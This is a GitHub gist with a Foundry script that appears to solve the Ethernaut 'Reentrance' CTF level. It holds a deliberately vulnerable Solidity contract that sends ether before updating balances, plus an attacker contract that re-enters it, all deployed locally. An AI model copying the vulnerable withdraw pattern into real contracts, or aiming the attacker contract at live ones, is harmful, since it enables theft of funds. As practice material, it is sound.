-
-
Save shafouz/d0f9cd17d0aafc1c350016f257c70bf8 to your computer and use it in GitHub Desktop.
π made with https://github.com/rerrorctf/ret
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.6.12; | |
import "openzeppelin-contracts-06/math/SafeMath.sol"; | |
import "forge-std/Script.sol"; | |
import "forge-std/console.sol"; | |
contract Reentrance { | |
using SafeMath for uint256; | |
mapping(address => uint256) public balances; | |
function donate(address _to) public payable { | |
balances[_to] = balances[_to].add(msg.value); | |
} | |
function balanceOf(address _who) public view returns (uint256 balance) { | |
return balances[_who]; | |
} | |
function withdraw(uint256 _amount) public { | |
if (balances[msg.sender] >= _amount) { | |
(bool result,) = msg.sender.call{value: _amount}(""); | |
if (result) { | |
_amount; | |
} | |
balances[msg.sender] -= _amount; | |
} | |
} | |
receive() external payable {} | |
} | |
interface IWithdraw { | |
function donate(address _to) external payable; | |
function withdraw(uint256 _amount) external; | |
} | |
contract Hax { | |
IWithdraw draw; | |
bool public stop = false; | |
constructor(address _addr) public payable { | |
draw = IWithdraw(_addr); | |
draw.donate{value: 0.001 ether}(address(this)); | |
draw.withdraw(0.001 ether); | |
} | |
fallback() external payable { | |
draw.donate{value: 0.002 ether}(address(this)); | |
} | |
} | |
contract ReentranceHax is Script { | |
function run() external { | |
// vm.startBroadcast(vm.envUint("PRIVATE_KEY")); | |
vm.startBroadcast(); | |
Reentrance re = new Reentrance(); | |
new Hax{value: 0.005 ether}(address(re)); | |
vm.stopBroadcast(); | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment